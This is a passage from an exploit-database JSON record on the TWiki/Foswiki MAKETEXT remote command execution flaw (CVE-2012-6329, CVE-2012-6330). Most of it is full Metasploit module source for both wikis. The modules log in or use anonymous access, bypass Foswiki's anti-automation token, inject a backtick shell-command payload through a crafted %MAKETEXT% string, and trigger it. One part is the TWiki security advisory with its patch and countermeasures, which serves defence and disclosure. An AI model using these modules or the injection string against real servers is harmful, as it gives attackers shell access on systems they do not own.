variables\r\n\t\t@page = ''\r\n\r\n\t\tif datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\r\n\t\t\t@page << '/' if datastore['TwikiPage'][0] != '/'\r\n\t\t\t@page << datastore['TwikiPage']\r\n\t\telse\r\n\t\t\t@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\r\n\t\tend\r\n\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if @base[-1, 1] != '/'\r\n\r\n\t\t# Login if needed\r\n\t\tif (datastore['USERNAME'] and\r\n\t\t\tnot datastore['USERNAME'].empty? and\r\n\t\t\tdatastore['PASSWORD'] and\r\n\t\t\tnot datastore['PASSWORD'].empty?)\r\n\t\t\tprint_status(\"Trying login to get session ID...\")\r\n\t\t\tsession = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n\t\telse\r\n\t\t\tprint_status(\"Using anonymous access...\")\r\n\t\t\tsession = \"\"\r\n\t\tend\r\n\r\n\t\tif not session\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\")\r\n\t\tend\r\n\r\n\t\t# Inject payload\r\n\t\tprint_status(\"Trying to inject the payload on #{@page}...\")\r\n\t\tres = inject_code(session, payload.encoded)\r\n\t\tif not res\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\")\r\n\t\tend\r\n\r\n\t\t# Execute payload\r\n\t\tprint_status(\"Executing the payload through #{res}...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => res,\r\n\t\t\t'cookie' => \"TWIKISID=#{session}\"\r\n\t\t})\r\n\t\tif not res or res.code != 200 or res.body !~ /HASH/\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error executing the payload\")\r\n\t\tend\r\n\r\n\t\tprint_good(\"Exploitation was successful\")\r\n\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n\r\n* Trigger:\r\n\r\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\r\n\r\n=end", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23579/"}, {"lastseen": "2016-02-02T21:18:59", "description": "Foswiki MAKETEXT Remote Command Execution. CVE-2012-6329,CVE-2012-6330. Remote exploit for unix platform", "published": "2012-12-23T00:00:00", "type": "exploitdb", "title": "Foswiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "modified": "2012-12-23T00:00:00", "id": "EDB-ID:23580", "href": "https://www.exploit-db.com/exploits/23580/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Foswiki MAKETEXT Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the MAKETEXT Foswiki variable. By using\r\n\t\t\t\ta specially crafted MAKETEXT, a malicious user can execute shell commands since the\r\n\t\t\t\tinput is passed to the Perl \"eval\" command without first being sanitized. The\r\n\t\t\t\tproblem is caused by an underlying security issue in the CPAN:Locale::Maketext\r\n\t\t\t\tmodule. Only Foswiki sites that have user interface localization enabled\r\n\t\t\t\t(UserInterfaceInternationalisation variable set) are vulnerable.\r\n\r\n\t\t\t\t\tIf USERNAME and PASSWORD aren't provided, anonymous access will be tried.\r\n\t\t\t\tAlso, if the FoswikiPage option isn't provided, the module will try to create a\r\n\t\t\t\trandom page on the SandBox space. The modules has been tested successfully on\r\n\t\t\t\tFoswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Brian Carlson', # original discovery in Perl Locale::Maketext\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-6329' ],\r\n\t\t\t\t\t[ 'OSVDB', '88410' ],\r\n\t\t\t\t\t[ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false, # web server context\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic ruby python bash telnet'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => [ 'unix' ],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Foswiki 1.1.5', { }]],\r\n\t\t\t'DisclosureDate' => 'Dec 03 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('TARGETURI', [ true, \"Foswiki base path\", \"/\" ]),\r\n\t\t\t\tOptString.new('FoswikiPage', [ false, \"Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\r\n\t\t\t\tOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\r\n\t\t\t\tOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef do_login(username, password)\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}bin/login\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'username' => username,\r\n\t\t\t\t\t'password' => password\r\n\t\t\t\t}\r\n\t\t\t})\r\n\r\n\t\tif not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/\r\n\t\t\tvprint_status \"#{res.code}\\n#{res.body}\"\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tsession = $1\r\n\t\treturn session\r\n\tend\r\n\r\n\tdef inject_code(session, code)\r\n\r\n\t\tvprint_status(\"Retrieving the validation_key...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}bin/edit#{@page}\",\r\n\t\t\t'cookie' => \"FOSWIKISID=#{session}\"\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200 or res.body !~ /name='validation_key' value='\\?([0-9a-f]*)'/\r\n\t\t\tvprint_error(\"Error retrieving the validation_key\")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tvalidation_key = $1\r\n\t\tvprint_good(\"validation_key found: #{validation_key}\")\r\n\r\n\t\tif session.empty?\r\n\t\t\tif res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/\r\n\t\t\t\tsession = $1\r\n\t\t\telse\r\n\t\t\t\tvprint_error(\"Error using anonymous access\")\r\n\t\t\t\treturn nil\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tif res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/\r\n\t\t\tstrike_one = $1\r\n\t\telse\r\n\t\t\tvprint_error(\"Error getting the FOSWIKISTRIKEONE value\")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\t# Transforming validation_key in order to bypass foswiki antiautomation\r\n\t\tvalidation_key = Rex::Text.md5(validation_key + strike_one)\r\n\t\tvprint_status(\"Transformed validation key: #{validation_key}\")\r\n\t\tvprint_status(\"Injecting the payload...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}bin/save#{@page}\",\r\n\t\t\t'cookie' => \"FOSWIKISID=#{session}\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t{\r\n\t\t\t\t'validation_key' => validation_key,\r\n\t\t\t\t'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\r\n\t\t\t}\r\n\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 302 or res.headers['Location'] !~ /bin\\/view#{@page}/\r\n\t\t\tprint_warning(\"Error injecting the payload\")\r\n\t\t\tprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tlocation = URI(res.headers['Location']).path\r\n\t\tprint_good(\"Payload injected on #{location}\")\r\n\r\n\t\treturn location\r\n\tend\r\n\r\n\tdef check\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if @base[-1, 1] != '/'\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}System/WebHome\"\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tif res.body =~ /This site is running Foswiki version.*Foswiki-(\\d\\.\\d\\.\\d)/\r\n\t\t\tversion = $1\r\n\t\t\tprint_status(\"Version found: #{version}\")\r\n\t\t\tif version <= \"1.1.6\"\r\n\t\t\t\treturn Exploit::CheckCode::Appears\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Detected\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\t# Init variables\r\n\t\t@page = ''\r\n\r\n\t\tif datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty?\r\n\t\t\t@page << '/' if datastore['FoswikiPage'][0] != '/'\r\n\t\t\t@page << datastore['FoswikiPage']\r\n\t\telse\r\n\t\t\t@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\r\n\t\tend\r\n\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if @base[-1, 1] != '/'\r\n\r\n\t\t# Login if needed\r\n\t\tif (datastore['USERNAME'] and\r\n\t\t\tnot datastore['USERNAME'].empty? and\r\n\t\t\tdatastore['PASSWORD'] and\r\n\t\t\tnot datastore['PASSWORD'].empty?)\r\n\t\t\tprint_status(\"Trying login to get session ID...\")\r\n\t\t\tsession = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n\t\telse\r\n\t\t\tprint_status(\"Using anonymous access...\")\r\n\t\t\tsession = \"\"\r\n\t\tend\r\n\r\n\t\tif not session\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\")\r\n\t\tend\r\n\r\n\t\t# Inject payload\r\n\t\tprint_status(\"Trying to inject the payload on #{@page}...\")\r\n\t\tres = inject_code(session, payload.encoded)\r\n\t\tif not res or res !~ /#{@page}/\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\")\r\n\t\tend\r\n\r\n\t\t# Execute payload\r\n\t\tprint_status(\"Executing the payload through #{@page}...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}#{@page}\",\r\n\t\t\t'cookie' => \"FOSWIKISID=#{session}\"\r\n\t\t})\r\n\t\tif not res or res.code != 200 or res.body !~ /HASH/\r\n\t\t\tprint_status(\"#{res.code}\\n#{res.body}\")\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error executing the payload\")\r\n\t\tend\r\n\r\n\t\tprint_good(\"Exploitation was successful\")\r\n\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n\r\n* Trigger:\r\n\r\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\r\n\r\n=end\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23580/"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:43", "description": "", "published": "2012-12-15T00:00:00", "type": "packetstorm", "title": "TWiki 5.1.2 Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-15T00:00:00", "id": "PACKETSTORM:118856", "href": "https://packetstormsecurity.com/files/118856/TWiki-5.1.2-Command-Execution.html", "sourceData": "`This security advisory alerts you of a potential security issue with \nTWiki installations: \nThe %MAKETEXT{}% TWiki variable allows arbitrary shell command \nexecution. The problem is caused by an underlying security issue in \nthe Locale::Maketext CPAN module. \n \n* Vulnerable Software Version \n* Attack Vectors \n* Impact \n* Severity Level \n* MITRE Name for this Vulnerability \n* Details \n* Countermeasures \n* Hotfix for TWiki Production Releases 5.1.x \n* Hotfix for older affected TWiki Releases \n* Authors and Credits \n* Action Plan with Timeline \n* External Links \n* Feedback \n \n---++ Vulnerable Software Version \n \n* TWiki-5.1.0 to TWiki-5.1.2 (TWikiRelease05x01x00 to \nTWikiRelease05x01x02) \n* TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02) \n* TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02) \n* TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04) \n* TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02) \n* TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05) \n \n---++ Attack Vectors \n \nEditing wiki pages and HTTP POST requests towards a TWiki server with \nenabled localization (typically port 80/TCP). Typically, prior \nauthentication is necessary. \n \n---++ Impact \n \nAn unauthenticated remote attacker can execute arbitrary shell \ncommands as the webserver user, such as user nobody. \n \n---++ Severity Level \n \nThe TWiki SecurityTeam triaged this issue as documented in \nTWikiSecurityAlertProcess [1] and assigned the following severity level: \n \n* Severity 1 issue: The web server can be compromised \n \n---++ MITRE Name for this Vulnerability \n \nThe Common Vulnerabilities and Exposures project has assigned the name \nCVE-2012-6329 [7] to this vulnerability. \n \n---++ Details \n \n1. Shell Command execution: The %MAKETEXT{}% TWiki variable is used to \nlocalize user interface content to a language of choice. Using a \nspecially crafted MAKETEXT, a malicious user can execute shell \ncommands by Perl backtick (``) operators. User input is passed to the \nPerl \"eval\" command without first being sanitized. The problem is \ncaused by an underlying security issue in the Locale::Maketext CPAN \nmodule. This works only in TWiki sites that have user interface \nlocalization enabled. \n \nIn addition, there are two less severe issues with MAKETEXT: \n \n2. Excessive memory allocation: %MAKETEXT{\"This is [_9999999999999999] \nEvil\"}% will consume all memory and swap space attempting to \ninitialize all missing entries in the parameters array. \n \n3. Crash: %MAKETEXT{\"This is [_0] problematic\"}% can cause a crash \nunder some circumstances. \n \n---++ Countermeasures \n \n* One of: \n* Disable localization by setting configure flag \n{UserInterfaceInternationalisation} to 0. \n* Apply hotfix (see patch below). \n* Upgrade to the latest patched production release TWiki-5.1.3 \n(TWikiRelease05x01x03) [2] when available. \n \n* In addition: \n* Install CPAN's Locale::Maketext version 1.23 or newer. \n* Use the {SafeEnvPath} configure setting to restrict the possible \ndirectories that are searched for executables. By default, this is \nthe PATH used by the webserver user. Set {SafeEnvPath} to a list of \nnon-writable directories, such as \"/bin:/usr/bin\". \n \n---++ Hotfix for TWiki Production Release 5.1.x \n \nAffected file: twiki/lib/TWiki.pm \n \nPatch to sanitize MAKETEXT parameters: \n \n=======( CUT 8><--- )=============================================== \n--- TWiki.pm (revision 24029) \n+++ TWiki.pm (working copy) \n@@ -4329,8 +4329,23 @@ \n \n# unescape parameters and calculate highest parameter number: \nmy $max = 0; \n- $str =~ s/~\\[(\\_(\\d+))~\\]/ $max = $2 if ($2 > $max); \"[$1]\"/ge; \n- $str =~ s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ $max = $2 if ($2 > \n$max); \"[$1]\"/ge; \n+ my $min = 1; \n+ $str =~ s/~\\[(\\_(\\d+))~\\]/ \n+ $max = $2 if ($2 > $max); \n+ $min = $2 if ($2 < $min); \n+ \"[$1]\"/ge; \n+ $str =~ s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ \n+ $max = $2 if ($2 > $max); \n+ $min = $2 if ($2 < $min); \n+ \"[$1]\"/ge; \n+ \n+ # Item7080: Sanitize MAKETEXT variable: \n+ return \"MAKETEXT error: No more than 32 parameters are allowed\" \nif( $max > 32 ); \n+ return \"MAKETEXT error: Parameter 0 is not allowed\" if( $min < 1 ); \n+ if( $TWiki::cfg{UserInterfaceInternationalisation} ) { \n+ eval { require Locale::Maketext; }; \n+ $str =~ s#\\\\#\\\\\\\\#g if( $@ || !$@ && \n$Locale::Maketext::VERSION < 1.23 ); \n+ } \n \n# get the args to be interpolated. \nmy $argsStr = $params->{args} || \"\"; \n=======( CUT 8><--- )=============================================== \n \nThis patch is also available separately [3] in case this gets mangled \nby the e-mail. \n \nOn a properly patched system, %MAKETEXT{\" [_99] \"}% should return this \nerror: \"MAKETEXT error: No more than 32 parameters are allowed\" \n \n---++ Hotfix for older affected TWiki Releases \n \nApply above patch (line numbers may vary). \n \n---++ Authors and Credits \n \n* Credit to TWiki:Main.GeorgeClark for disclosing the issue to the twiki-security@lists.sourceforge.net \nmailing list, and for providing a proposed fix. \n* TWiki:Main.PeterThoeny for creating the fix, patch and advisory. \n \n---++ Action Plan with Timeline \n \n* 2012-12-10: User discloses issue to TWikiSecurityMailingList [4], \nGeorge Clark, Foswiki \n* 2012-12-10: Developer verifies issue, Peter Thoeny \n* 2012-12-10: Developer fixes code, Peter Thoeny \n* 2012-12-10: Security team creates advisory with hotfix, Peter Thoeny \n* 2012-12-11: Developer verifies patch, Hideyo Imazu \n* 2012-12-12: Send alert to TWikiAnnounceMailingList [5] and \nTWikiDevMailingList [6], Peter Thoeny \n* 2012-12-14: Publish advisory in Codev web and update all related \ntopics, Peter Thoeny \n* 2012-12-14: Issue a public security advisory to full- \ndisclosure[at]lists.grok.org.uk, cert[at]cert.org, \nvuln[at]secunia.com, bugs[at]securitytracker.com, Peter Thoeny \n \n---++ External Links \n \n[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess \n[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease05x01x03 \n[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329 \n[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList \n[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList \n[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList \n[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329 - CVE \non MITRE.org \n \n---++ Feedback \n \nPlease provide feedback at the security alert topic, \nhttp://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329 \n \n-- Main.PeterThoeny - 2012-12-14 \n \n-- \n* Peter Thoeny - peter09[at]thoeny.org \n* http://TWiki.org - is your team already TWiki enabled? \n* Knowledge cannot be managed, it can be discovered and shared \n* This e-mail is: (_) private (x) ask first (_) public \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/118856/twiki5-exec.txt"}, {"lastseen": "2016-12-05T22:20:57", "description": "", "published": "2012-12-24T00:00:00", "type": "packetstorm", "title": "TWiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-24T00:00:00", "id": "PACKETSTORM:119054", "href": "https://packetstormsecurity.com/files/119054/TWiki-MAKETEXT-Remote-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TWiki MAKETEXT Remote Command Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the MAKETEXT Twiki variable. By using a \nspecially crafted MAKETEXT, a malicious user can execute shell commands since user \ninput is passed to the Perl \"eval\" command without first being sanitized. The \nproblem is caused by an underlying security issue in the CPAN:Locale::Maketext \nmodule. This works in TWiki sites that have user interface localization enabled \n(UserInterfaceInternationalisation variable set). \n \nIf USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, \nif the 'TwikiPage' option isn't provided, the module will try to create a random \npage on the SandBox space. The modules has been tested successfully on \nTWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine. \n}, \n'Author' => \n[ \n'George Clark', # original discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2012-6329' ], \n[ 'OSVDB', '88460' ], \n[ 'BID', '56950' ], \n[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ] \n], \n'Privileged' => false, # web server context \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 1024, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic ruby python bash telnet' \n} \n}, \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Automatic', { }]], \n'DisclosureDate' => 'Dec 15 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]), \nOptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]), \nOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]), \nOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ]) \n], self.class) \nend \n \ndef do_login(username, password) \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}do/login\", \n'vars_post' => \n{ \n'username' => username, \n'password' => password \n} \n}) \n \nif not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/ \nreturn nil \nend \n \nsession = $1 \nreturn session \nend \n \ndef inject_code(session, code) \n \nvprint_status(\"Retrieving the crypttoken...\") \n \nres = send_request_cgi({ \n'uri' => \"#{@base}do/edit#{@page}\", \n'cookie' => \"TWIKISID=#{session}\", \n'vars_get' => \n{ \n'nowysiwyg' => '1' \n} \n}) \n \nif not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/ \nvprint_error(\"Error retrieving the crypttoken\") \nreturn nil \nend \n \ncrypttoken = $1 \nvprint_good(\"crypttoken found: #{crypttoken}\") \n \nif session.empty? \nif res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/ \nsession = $1 \nelse \nvprint_error(\"Error using anonymous access\") \nreturn nil \nend \nend \n \nvprint_status(\"Injecting the payload...\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}do/save#{@page}\", \n'cookie' => \"TWIKISID=#{session}\", \n'vars_post' => \n{ \n'crypttoken' => crypttoken, \n'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\" \n} \n}) \n \nif not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/ \nprint_warning(\"Error injecting the payload\") \nprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\" \nreturn nil \nend \n \nlocation = URI(res.headers['Location']).path \nprint_good(\"Payload injected on #{location}\") \n \nreturn location \nend \n \ndef check \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \nres = send_request_cgi({ \n'uri' => \"#{@base}do/view/TWiki/WebHome\" \n}) \n \nif not res or res.code != 200 \nreturn Exploit::CheckCode::Unknown \nend \n \nif res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/ \nversion = $1 \nprint_status(\"Version found: #{version}\") \nif version < \"5.1.3\" \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \nreturn Exploit::CheckCode::Detected \nend \n \n \ndef exploit \n \n# Init variables \n@page = '' \n \nif datastore['TwikiPage'] and not datastore['TwikiPage'].empty? \n@page << '/' if datastore['TwikiPage'][0] != '/' \n@page << datastore['TwikiPage'] \nelse \n@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\" \nend \n \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \n# Login if needed \nif (datastore['USERNAME'] and \nnot datastore['USERNAME'].empty? and \ndatastore['PASSWORD'] and \nnot datastore['PASSWORD'].empty?) \nprint_status(\"Trying login to get session ID...\") \nsession = do_login(datastore['USERNAME'], datastore['PASSWORD']) \nelse \nprint_status(\"Using anonymous access...\") \nsession = \"\" \nend \n \nif not session \nfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\") \nend \n \n# Inject payload \nprint_status(\"Trying to inject the payload on #{@page}...\") \nres = inject_code(session, payload.encoded) \nif not res \nfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\") \nend \n \n# Execute payload \nprint_status(\"Executing the payload through #{res}...\") \nres = send_request_cgi({ \n'uri' => res, \n'cookie' => \"TWIKISID=#{session}\" \n}) \nif not res or res.code != 200 or res.body !~ /HASH/ \nfail_with(Exploit::Failure::Unknown, \"Error executing the payload\") \nend \n \nprint_good(\"Exploitation was successful\") \n \nend \n \nend \n \n=begin \n \n* Trigger: \n \n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}% \n \n=end`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119054/twiki_maketext.rb.txt"}, {"lastseen": "2016-12-05T22:12:57", "description": "", "published": "2012-12-24T00:00:00", "type": "packetstorm", "title": "Foswiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "modified": "2012-12-24T00:00:00", "id": "PACKETSTORM:119055", "href": "https://packetstormsecurity.com/files/119055/Foswiki-MAKETEXT-Remote-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Foswiki MAKETEXT Remote Command Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the MAKETEXT Foswiki variable. By using \na specially crafted MAKETEXT, a malicious user can execute shell commands since the \ninput is passed to the Perl \"eval\" command without first being sanitized. The \nproblem is caused by an underlying security issue in the CPAN:Locale::Maketext \nmodule. Only Foswiki sites that have user interface localization enabled \n(UserInterfaceInternationalisation variable set) are vulnerable. \n \nIf USERNAME and PASSWORD aren't provided, anonymous access will be tried. \nAlso, if the FoswikiPage option isn't provided, the module will try to create a \nrandom page on the SandBox space. The modules has been tested successfully on \nFoswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image. \n}, \n'Author' => \n[ \n'Brian Carlson', # original discovery in Perl Locale::Maketext \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2012-6329' ], \n[ 'OSVDB', '88410' ], \n[ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ] \n], \n'Privileged' => false, # web server context \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 1024, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic ruby python bash telnet' \n} \n}, \n'Platform' => [ 'unix' ], \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Foswiki 1.1.5', { }]], \n'DisclosureDate' => 'Dec 03 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"Foswiki base path\", \"/\" ]), \nOptString.new('FoswikiPage', [ false, \"Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]), \nOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]), \nOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ]) \n], self.class) \nend \n \ndef do_login(username, password) \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}bin/login\", \n'vars_post' => \n{ \n'username' => username, 